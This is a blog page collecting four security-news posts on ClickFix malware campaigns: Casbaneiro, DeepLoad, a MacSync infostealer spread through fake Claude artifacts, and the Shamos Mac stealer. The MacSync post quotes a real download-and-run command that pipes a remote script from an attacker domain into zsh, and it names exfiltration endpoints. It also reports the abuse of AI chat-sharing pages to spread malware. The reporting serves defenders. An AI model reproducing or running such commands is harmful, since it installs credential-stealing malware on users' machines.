Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label ClickFix Attacks. Show all posts
Windows
Casbaneiro ClickFix Attacks Europe Gmail Latin America malware Phishing emails Windows

Hackers Use Fake Legal Emails to Spread Casbaneiro Malware

 



A coordinated phishing operation is targeting Spanish-speaking users in both Latin America and Europe, using layered infection methods to deploy banking malware on Windows systems.

The campaign delivers the Casbaneiro trojan, also referred to as Metamorfo, and relies on an additional malware strain called Horabot to assist in spreading the infection. Investigators have linked the activity to a Brazil-based cybercrime group tracked as Augmented Marauder and Water Saci, which was first publicly reported by Trend Micro in October 2025.

Technical findings shared by BlueVoyant researchers Thomas Elkins and Joshua Green show that the attackers operate through multiple entry points. Their approach combines phishing emails, automated messaging through WhatsApp, and social engineering techniques such as ClickFix. This setup allows them to simultaneously target everyday users and corporate environments. While WhatsApp-based scripts are mainly used to reach consumers in Latin America, the group also runs an email takeover mechanism aimed at breaching business systems in both Latin America and Europe.

The attack begins with an email crafted to resemble a legal notice, often framed as a court-related message. Recipients are urged to open a password-protected PDF file attached to the email. Inside the document, a link directs the user to a harmful website, which triggers the download of a compressed ZIP file. Opening this file leads to the execution of intermediate components, including HTML Application files and Visual Basic scripts.

The VBS script conducts several checks before continuing, including verifying the presence of antivirus tools such as Avast. These checks are designed to avoid analysis or detection. Once completed, the script contacts an external server to download further payloads. Among these are AutoIt-based loaders that unpack encrypted files with extensions like “.ia” and “.at,” eventually activating both Casbaneiro and Horabot on the infected system.

Casbaneiro serves as the main malware responsible for financial theft, while Horabot is used to expand the attack’s reach. After installation, Casbaneiro communicates with a command server to retrieve a PowerShell script. This script uses Horabot to extract contact lists from Microsoft Outlook and send phishing emails from the victim’s own account.

A key change in this campaign is the use of dynamically generated phishing documents. Instead of distributing a fixed malicious file, the malware sends a request to a remote server, including a randomly created four-digit code. The server responds by generating a unique, password-protected PDF designed to mimic a Spanish judicial summons. This file is then attached to phishing emails sent to new targets, making each message appear more personalized and credible.

The operation also uses a secondary Horabot-related file that acts as both a spam tool and an account hijacker. It targets email services such as Yahoo, Gmail, and Microsoft Live, enabling attackers to send phishing messages through compromised Outlook accounts. Researchers note that Horabot has been used in attacks across Latin America since at least November 2020.

Earlier campaigns linked to Water Saci relied heavily on WhatsApp Web to spread malware in a self-propagating manner, including banking threats like Maverick and Casbaneiro. More recent activity, as observed by Kaspersky, shows the use of ClickFix tactics, where users are tricked into executing malicious HTA files under the pretense of resolving technical issues.

Researchers conclude that the attackers are continuously refining their methods by combining multiple delivery channels. The use of WhatsApp automation, dynamically generated PDF lures, and ClickFix techniques allows them to bypass security controls more effectively. The group appears to operate parallel attack chains, switching between WhatsApp-driven distribution and email-based infection methods powered by Horabot, depending on the target environment.

This activity points to a wider change in how cybercriminal operations are structured, where threat actors increasingly depend on adaptable tactics, automated tools, and manipulation of user behavior to maintain and expand attacks across different regions.

Read more »
PowerShell
ClickFix Attacks Credentials Stolen DeepLoad malware PowerShell

DeepLoad Malware Found Stealing Browser Data Using ClickFix

 


A contemporary cyber campaign is using a deceptive method known as ClickFix to distribute a previously undocumented malware loader called DeepLoad, raising fresh concerns about newly engineered attack techniques.

Researchers from ReliaQuest report that the malware is designed with advanced evasion capabilities. It likely incorporates AI-assisted obfuscation to make analysis more difficult and relies on process injection to avoid detection by conventional security tools. Alarmingly, the malware begins stealing credentials almost immediately after execution, capturing passwords and active session data even if the initial infection stage is interrupted.

The attack chain starts with a ClickFix lure, where users are misled into copying and executing a PowerShell command via the Windows Run dialog. The instruction is presented as a solution to a problem that does not actually exist. Once executed, the command leverages “mshta.exe,” a legitimate Windows binary, to download and launch a heavily obfuscated PowerShell-based loader.

To conceal its true purpose, the loader’s code is filled with irrelevant and misleading variable assignments. This approach is believed to have been enhanced using artificial intelligence tools to generate complex obfuscation layers that can bypass static analysis systems.

DeepLoad is carefully engineered to blend into normal system behavior. It disguises its payload as “LockAppHost.exe,” a legitimate Windows process responsible for managing the system lock screen, making its activity less suspicious to both users and security tools.

The malware also attempts to erase traces of its execution. It disables PowerShell command history and avoids standard PowerShell functions. Instead, it directly calls underlying Windows system functions to execute processes and manipulate memory, effectively bypassing monitoring mechanisms that track PowerShell activity.

To further evade detection, DeepLoad dynamically creates a secondary malicious component. By using PowerShell’s Add-Type feature, it compiles C# code during runtime, generating a temporary Dynamic Link Library (DLL) file in the system’s Temp directory. Each time the malware runs, this DLL is created with a different name, making it difficult for security solutions to detect based on file signatures.

Another key technique used is asynchronous procedure call (APC) injection. This allows the malware to execute its payload within a legitimate Windows process without writing a fully decoded malicious file to disk. It achieves this by launching a trusted process in a suspended state, injecting malicious code into its memory, and then resuming execution.

DeepLoad’s primary objective is to steal user credentials. It extracts saved passwords from web browsers and deploys a malicious browser extension that intercepts login information as users type it into websites. This extension remains active across sessions unless it is manually removed.

The malware also includes a propagation mechanism. When it detects the connection of removable media such as USB drives, it copies malicious shortcut files onto the device. These files use deceptive names like “ChromeSetup.lnk,” “Firefox Installer.lnk,” and “AnyDesk.lnk” to appear legitimate and trick users into executing them.

Persistence is achieved through Windows Management Instrumentation (WMI). The malware sets up a mechanism that can reinfect a system even after it appears to have been cleaned, typically after a delay of several days. This technique also disrupts standard detection methods by breaking the usual parent-child process relationships that security tools rely on.

Overall, DeepLoad appears to be designed as a multi-functional threat capable of operating across several stages of a cyberattack lifecycle. Its ability to avoid writing clear artifacts to disk, mimic legitimate system processes, and spread across devices makes it particularly difficult to detect and contain.

The exact timeline of when DeepLoad began appearing in real-world attacks and the overall scale of its use remain unclear. However, researchers describe it as a relatively new threat, and its use of ClickFix suggests it could spread more widely in the near future. There are also indications that its infrastructure may resemble a shared or service-based model, although it has not been confirmed whether it is being offered as malware-as-a-service.

In a separate but related finding, researchers from G DATA have identified another malware loader called Kiss Loader. This threat is distributed through phishing emails containing Windows Internet Shortcut files. When opened, these files connect to a remote WebDAV server hosted on a TryCloudflare domain and download another shortcut that appears to be a PDF document.

When executed, the downloaded file triggers a chain of scripts. It starts with a Windows Script Host process that runs JavaScript, which then retrieves and executes a batch script. This script displays a decoy PDF to avoid suspicion, establishes persistence by adding itself to the system’s Startup folder, and downloads the Python-based Kiss Loader.

In its final stage, Kiss Loader decrypts and executes Venom RAT, a remote access trojan, using APC injection. The extent of this campaign is currently unknown, and it is not clear whether the malware is part of a broader malware-as-a-service offering. The threat actor behind the operation has claimed to be based in Malawi, although this has not been independently verified.

Cyber threats are taking new shapes every day. Attackers are increasingly combining social engineering, fileless execution techniques, and advanced obfuscation to bypass traditional defenses. This evolution highlights the growing need for continuous monitoring, stronger endpoint protection, and improved user awareness to defend against increasingly sophisticated attacks.

Read more »
Mac OS
Claude Claude AI risk ClickFix ClickFix Attacks Cyber Security Google Ads Infostealer Infostealer Malware Mac OS

ClickFix Campaigns Exploit Claude Artifacts to Target macOS Users with Infostealers

 

One out of every hundred Mac users searching online might now face hidden risks. Instead of helpful tools, some find traps disguised as guides - especially when looking up things like "DNS resolver" or "HomeBrew." Behind these results, attackers run silent operations using fake posts linked to real services. Notably, they borrow content connected to Claude, spreading it through paid search ads on Google. Each click can lead straight into their hands. Two separate versions of this scheme are already circulating. Evidence suggests more than ten thousand people followed the harmful steps without knowing. Most never realized what was taken. Quiet but widespread, the pattern reveals how easily trust gets hijacked in plain sight. 

Beginning with public posts shaped by Anthropic’s AI, a Claude artifact emerges when someone shares output from the system online. Hosted on claude.ai, such material might include scripts, how-tos, or fragments of working code - open for viewing through shared URLs. During recent ClickFix operations, deceptive search entries reroute people toward counterfeit versions of these documents. Instead of genuine help, visitors land on forged Medium pieces mimicking Apple's support site. From there, directions appear telling them to insert command-line strings straight into Terminal. Though it feels harmless at first glance, that single step triggers the start of compromise. 

The technical execution of these attacks involves two primary command variants. One common method utilizes an `echo` command, which is then piped through `base64 -D | zsh` for execution. The second variant employs a `curl` command to covertly fetch and execute a remote script: `true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh`. Upon successful execution of either command, the MacSync infostealer is deployed onto the macOS system. This potent malware is specifically engineered to exfiltrate a wide array of sensitive user data, including crucial keychain information, browser data, and cryptocurrency wallet details. 

One way attackers stay hidden involves disguising their traffic as ordinary web requests. A suspicious Claude guide, spotted by Moonlock Lab analysts, reached more than 15,600 users - an indicator of wide exposure. Instead of sending raw information, the system bundles stolen content neatly into a ZIP file, often stored temporarily under `/tmp/osalogging.zip`. This package then travels outward through an HTTP POST directed at domains such as `a2abotnet[.]com/gate`. Behind the scenes, access relies on fixed credentials: a preset token and API key baked directly into the code. For extra stealth, it mimics a macOS-based browser's digital fingerprint during exchanges. When uploads stall, the archive splits into lighter segments, allowing repeated tries - up to eight attempts occur if needed. Once delivery finishes, leftover files vanish instantly, leaving minimal evidence behind.  

This latest operation looks much like earlier efforts where hackers used chat-sharing functions in major language models - like ChatGPT and Grok - to spread the AMOS infostealer. What makes the shift toward targeting Claude notable is how attackers keep expanding their methods across different AI systems. Because of this, users need to stay highly alert, especially when it comes to running Terminal instructions they do not completely trust. One useful check, pointed out by Kaspersky analysts, means pausing first to ask the same assistant about any command’s intent and risk before carrying it out.
Read more »
Shamos
ClickFix Attacks Cookie Spider Infostealer Mac Users malware Shamos

New Shamos Malware Targets Mac Users Through Fake Tech Support Sites

 

Cybersecurity researchers have unearthed a new Mac-targeting malware called Shamos that deceives users through fake troubleshooting guides and repair solutions. This information-stealing malware, developed by the cybercriminal organization "COOKIE SPIDER," represents a variant of the previously known Atomic macOS Stealer (AMOS).

Modus operandi

The malware spreads through ClickFix attacks, which utilize malicious advertisements and counterfeit GitHub repositories to trick victims. Attackers create deceptive websites such as mac-safer[.]com and rescue-mac[.]com that appear to offer legitimate macOS problem-solving assistance. These sites instruct users to copy and paste Terminal commands that supposedly fix common system issues. 

However, these commands actually decode Base64-encoded URLs and retrieve malicious Bash scripts from remote servers. The scripts capture user passwords, download the Shamos executable, and use system tools like 'xattr' and 'chmod' to bypass Apple's Gatekeeper security feature. 

Data theft capabilities

Once installed, Shamos performs comprehensive data collection targeting multiple sensitive areas. The malware searches for cryptocurrency wallet files, Keychain credentials, Apple Notes content, and browser-stored information. It employs anti-virtual machine commands to avoid detection in security sandboxes and uses AppleScript for system reconnaissance.

All stolen data gets compressed into an archive file named 'out.zip' before transmission to the attackers via curl commands. When operating with administrator privileges, Shamos establishes persistence by creating a Plist file in the LaunchDaemons directory, ensuring automatic execution during system startup. 

CrowdStrike's monitoring has detected Shamos attempting infections across more than 300 environments globally since June 2025. The security firm has also observed instances where attackers deployed additional malicious components, including fake Ledger Live cryptocurrency applications and botnet modules. 

Safety measures

Security experts strongly advise Mac users to avoid executing any online commands they don't fully understand. Users should be particularly cautious with GitHub repositories, as the platform hosts numerous malicious projects designed to infect unsuspecting individuals.

For legitimate macOS assistance, users should bypass sponsored search results and instead consult Apple Community forums or the built-in Help system (Cmd + Space → "Help"). ClickFix attacks have proven highly effective across various platforms, appearing in TikTok videos, fake captchas, and bogus Google Meet error messages, making user awareness crucial for prevention.
Read more »
Subscribe to: Posts (Atom)